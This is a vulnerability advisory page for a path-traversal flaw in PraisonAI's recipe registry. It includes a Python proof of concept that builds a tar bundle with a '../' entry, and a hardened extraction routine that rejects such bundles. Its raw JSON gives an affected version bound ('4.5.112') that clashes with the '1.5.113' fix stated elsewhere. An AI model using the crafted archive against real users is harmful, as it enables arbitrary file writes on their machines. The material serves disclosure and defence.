Security Vulnerability Report
CVE-2026-39306 CVSS 7.3 HIGH

CVE-2026-39306

Published: 2026-04-07 17:16:36
Last Modified: 2026-04-16 01:23:38

Description

PraisonAI is a multi-agent teams system. Prior to 1.5.113, PraisonAI's recipe registry pull flow extracts attacker-controlled .praison tar archives with tar.extractall() and does not validate archive member paths before extraction. A malicious publisher can upload a recipe bundle that contains ../ traversal entries and any user who later pulls that recipe will write files outside the output directory they selected. This is a path traversal / arbitrary file write vulnerability on the client side of the recipe registry workflow. It affects both the local registry pull path and the HTTP registry pull path. The checksum verification does not prevent exploitation because the malicious traversal payload is part of the signed bundle itself. This vulnerability is fixed in 1.5.113.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:* - VULNERABLE
PraisonAI < 1.5.113

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-39306
# This script demonstrates how a malicious tar archive can be created
# to exploit the path traversal vulnerability in PraisonAI < 1.5.113.
import tarfile


def create_malicious_tar():
    # Create a file to be included in the archive
    payload_content = b"Malicious payload content"
    with open("evil.txt", "wb") as f:
        f.write(payload_content)

    # Create a tar archive
    with tarfile.open("malicious_recipe.praison", "w") as tar:
        # Add a file with a path traversal sequence (../)
        # This will attempt to write to the parent directory upon extraction
        tar.add("evil.txt", arcname="../../../tmp/evil_payload.txt")

    print("[+] Malicious tar archive created: malicious_recipe.praison")
    print("[+] Use this file in the recipe registry to test the vulnerability.")


# Note: The vulnerable code in PraisonAI would look something like:
# tar = tarfile.open(file_path)
# tar.extractall(output_dir)  # Vulnerable call without path validation
# tar.close()

if __name__ == "__main__":
    create_malicious_tar()
```
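As an added defensive example (not PraisonAI's code and not taken from the advisory), this is the hardened counterpart of the `tar.extractall(output_dir)` call noted above: every member's resolved destination is checked against the chosen output directory before anything is written, so a bundle carrying the PoC's `../../../tmp/evil_payload.txt` entry is refused as a whole, which is the check a bundle checksum cannot provide. The `.praison` layout (`recipe/recipe.yaml`) and the sample contents are constructed for the demonstration.

```python
import io
import os
import tarfile
import tempfile

def validate_member(member: tarfile.TarInfo, output_dir: str) -> str:
    """Resolve a member's destination or raise ValueError if it is unsafe."""
    root = os.path.realpath(output_dir)
    dest = os.path.realpath(os.path.join(root, member.name))
    # ../ traversal or an absolute name resolves outside the chosen directory
    if dest != root and not dest.startswith(root + os.sep):
        raise ValueError(f"path traversal in archive member: {member.name!r}")
    # links and device nodes can redirect later writes, so refuse them as well
    # (Python 3.12+ ships tarfile.data_filter, which applies the same rules)
    if member.issym() or member.islnk() or not (member.isfile() or member.isdir()):
        raise ValueError(f"unsupported entry type: {member.name!r}")
    return dest

def safe_extract(archive: str, output_dir: str) -> list[str]:
    """Validate every member before writing anything; return the written paths."""
    with tarfile.open(archive, "r:*") as tar:
        members = tar.getmembers()
        dests = [validate_member(m, output_dir) for m in members]  # all-or-nothing
        tar.extractall(output_dir, members=members)
    return dests

def build_bundle(path: str, entries: dict[str, bytes]) -> str:
    """Construct a .praison-style tar bundle from {member name: content} (sample data)."""
    with tarfile.open(path, "w") as tar:
        for name, content in entries.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tar.addfile(info, io.BytesIO(content))
    return path

def demo() -> dict[str, object]:
    """A clean bundle extracts; one carrying the PoC's ../ entry is refused."""
    clean = {"recipe/recipe.yaml": b"name: demo\n"}
    hostile = {**clean, "../../../tmp/evil_payload.txt": b"constructed sample"}
    results: dict[str, object] = {}
    with tempfile.TemporaryDirectory() as work:
        out_a, out_b = os.path.join(work, "out_a"), os.path.join(work, "out_b")
        bundle_a = build_bundle(os.path.join(work, "a.praison"), clean)
        results["clean"] = [os.path.relpath(p, out_a) for p in safe_extract(bundle_a, out_a)]
        try:
            safe_extract(build_bundle(os.path.join(work, "b.praison"), hostile), out_b)
            results["hostile"] = "extracted"
        except ValueError as exc:
            results["hostile"] = str(exc)
        results["out_b_untouched"] = not os.path.exists(out_b)  # nothing was written
    return results
```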

References

https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534 (Exploit, Vendor Advisory)

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-39306",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-07T17:16:36.470",
    "lastModified": "2026-04-16T01:23:37.567",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "PraisonAI is a multi-agent teams system. Prior to 1.5.113, PraisonAI's recipe registry pull flow extracts attacker-controlled .praison tar archives with tar.extractall() and does not validate archive member paths before extraction. A malicious publisher can upload a recipe bundle that contains ../ traversal entries and any user who later pulls that recipe will write files outside the output directory they selected. This is a path traversal / arbitrary file write vulnerability on the client side of the recipe registry workflow. It affects both the local registry pull path and the HTTP registry pull path. The checksum verification does not prevent exploitation because the malicious traversal payload is part of the signed bundle itself. This vulnerability is fixed in 1.5.113."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H",
            "baseScore": 7.3,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 5.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-22"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:praison:praisonai:*:*:*:*:*:*:*:*",
                "versionEndIncluding": "4.5.112",
                "matchCriteriaId": "93136744-3972-4DDD-B569-091065F57C0B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-4rx4-4r3x-6534",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      }
    ]
  }
}
```